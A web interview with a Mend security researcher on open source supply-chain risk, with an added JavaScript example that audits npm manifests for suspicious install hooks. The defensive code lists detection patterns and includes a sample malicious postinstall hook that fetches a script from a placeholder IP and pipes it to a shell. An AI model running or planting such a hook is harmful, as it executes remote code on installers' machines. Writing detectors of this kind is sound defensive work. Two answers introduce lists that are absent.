From ransomware and viruses to data breaches, there are many types of security threats to look out for. Because they’re becoming more complex, it’s getting more difficult to secure an organization and avoid the financial and reputational consequences of a compromise.
While some organizations rely on traditional security measures, such as encrypting data or running antivirus software, they should also consider more advanced solutions, such as open source security and license management services.
For this reason, to discuss the right security measures for companies, we invited Daniel Elkabes, the lead security researcher at Mend – a company that specializes in application security.
How did the idea of Mend originate? What has your journey been like so far?
Mend was founded in 2008 when our founders were about to sell their previous company, Eurekify. The buyers of the company asked for a software inventory and security scan, which turned out to be a nightmare to do because the process wasn’t automated. It was time-consuming, expensive, and riddled with potential errors. From there, the founders decided to design a solution to automate all tasks around the use and security of open source components in order to save others from facing the same challenges they did.
Since the company’s inception, we’ve had a number of exciting milestones, including acquiring Diffend, an open source malware security and threat detection solution; launching Mend Cure, the first-ever security auto-remediation application designed for custom code; and entering into the SAST (static application security testing) market.
Can you tell us a little bit about what you do? What issues do your products help solve?
As a pioneer of software composition analysis (SCA), Mend helps organizations secure their code by detecting vulnerabilities and fixing them. Our technology easily integrates into the developer’s workflow, protecting organizations against the most critical vulnerabilities while reducing risk and increasing the productivity of security and development teams.
What technology do you use to detect and eliminate threats before it is too late?
We have two products:
Do you think the recent global events are going to alter the ways in which threat actors operate?
The threat landscape is changing daily, and attackers are becoming increasingly sophisticated. We’ve seen this play out with major incidents like SolarWinds, Colonial Pipeline, Log4j, and more. Global geopolitical events will likely further impact the severity of these attacks, and organizations need to be ready.
What measures should organizations and individuals implement to combat these new threats?
Organizations can take the following steps to combat new threats:
In your opinion, which industries should be especially attentive when it comes to application security?
It is no longer a matter of if an organization will be targeted by threat actors – it’s a matter of when. All organizations, no matter the industry, should be taking precautions to protect against these risks and arming their employees with the necessary tools.
How do cybercriminals take advantage of unprotected code? What is the worst that can happen?
A threat actor could potentially plant nefarious code into a third-party package. If an unsuspecting victim then uses the software that depends on the vulnerable package, their system can become compromised. For example, a recent report we published found more than 1,300 malicious npm packages were responsible for stealing credentials and crypto, as well as for running botnets and collecting host information from machines on which they were installed. It’s vital for developers to understand what attackers are doing and how to remediate issues without slowing down the development process.
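As an added illustration of the install-time attack path described in the answer above (this is example code written for this page, not Mend's or Diffend's scanner): malicious npm packages very often place their payload in a lifecycle script such as `preinstall` or `postinstall`, so that simply installing the dependency executes attacker code. The heuristic audit below reads package manifests, flags every lifecycle hook, and looks for patterns that are common in such payloads. The three manifests, the pattern list and the `198.51.100.7` address (a documentation-only IP) are constructed for the example; the pattern list is a heuristic and assumes nothing about how any real scanner works.

```javascript
// Heuristic pre-install audit of npm package manifests (added example).
// It does not replace a real SCA / malware scanner; it shows the kind of
// signal those tools look for before an install hook is allowed to run.

// Lifecycle hooks npm runs automatically during `npm install`.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Constructed, non-exhaustive list of patterns seen in install-time payloads.
const SUSPICIOUS_PATTERNS = [
  // download something and pipe it straight into a shell
  { id: "remote-fetch-exec", re: /\b(curl|wget)\b[^|;&]*\|\s*(sh|bash)\b/ },
  // inline JavaScript handed to node on the command line
  { id: "inline-node", re: /\bnode\s+-e\b/ },
  // payload hidden behind base64 decoding
  { id: "base64-decode", re: /base64\s+(-d|--decode)|Buffer\.from\([^)]*['"]base64['"]\)/ },
  // dynamic code evaluation
  { id: "eval", re: /\beval\s*\(/ },
  // reading the environment, typical of credential / token exfiltration
  { id: "env-exfil", re: /process\.env|\$\{?(HOME|AWS_[A-Z_]+|NPM_TOKEN)\b/ },
];

// Returns one finding per lifecycle hook plus one per suspicious pattern
// that matches the hook's command line.
function auditManifest(manifest) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    // Any install hook deserves a look, even a legitimate native build.
    findings.push({ hook, command: cmd, pattern: "lifecycle-hook", severity: "info" });
    for (const p of SUSPICIOUS_PATTERNS) {
      if (p.re.test(cmd)) {
        findings.push({ hook, command: cmd, pattern: p.id, severity: "high" });
      }
    }
  }
  return findings;
}

// Collapses findings into a triage verdict for the package.
function riskLevel(findings) {
  if (findings.some((f) => f.severity === "high")) return "high";
  if (findings.length > 0) return "review"; // has hooks, nothing obviously bad
  return "clean";
}

// Constructed sample manifests: a plain library, a package with a hostile
// postinstall hook, and a legitimate native add-on that needs an install step.
const SAMPLE_MANIFESTS = {
  "left-pad-ish": {
    name: "left-pad-ish",
    version: "1.0.0",
    scripts: { test: "node test.js" },
  },
  "evil-colors": {
    name: "evil-colors",
    version: "1.4.0",
    scripts: {
      postinstall:
        "node -e \"require('child_process').exec('curl -s http://198.51.100.7/x.sh | sh')\"",
    },
  },
  "native-addon": {
    name: "native-addon",
    version: "2.1.0",
    scripts: { install: "node-gyp rebuild" },
  },
};

// Audits every manifest and returns { name: { level, findings } }.
function auditAll(manifests) {
  const report = {};
  for (const [name, manifest] of Object.entries(manifests)) {
    const findings = auditManifest(manifest);
    report[name] = { level: riskLevel(findings), findings };
  }
  return report;
}

// Stand-alone run: prints the triage verdict per package.
for (const [name, { level, findings }] of Object.entries(auditAll(SAMPLE_MANIFESTS))) {
  const hits = findings.filter((f) => f.severity === "high").map((f) => f.pattern);
  console.log(`${name}: ${level}${hits.length ? " (" + hits.join(", ") + ")" : ""}`);
}

module.exports = { auditManifest, riskLevel, auditAll, SAMPLE_MANIFESTS };
```

A hook that only runs a local file (`node scripts/setup.js`) is reported as `review` here because the command line itself is innocuous; a real check has to open that file and scan its contents too. Independently of any scanner, running installs with `npm install --ignore-scripts` (or setting `ignore-scripts=true` in `.npmrc`) stops lifecycle hooks from executing at all, at the cost of breaking packages that genuinely need a build step.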
Besides application security, what other best practices do you think every organization should follow to secure their operations?
At a higher level, organizations should look to implement a Zero Trust security model. Zero Trust is a proactive approach that requires every request – whether it comes from inside or outside the corporate network – to be authenticated, authorized, and continuously validated before being allowed to access resources and data. Having a Zero Trust framework in place can help mitigate supply chain vulnerabilities and better secure your organization from bad actors.
What does the future hold for Mend?
We have a lot of exciting things in the works over the coming months that we will share with you soon. Stay tuned!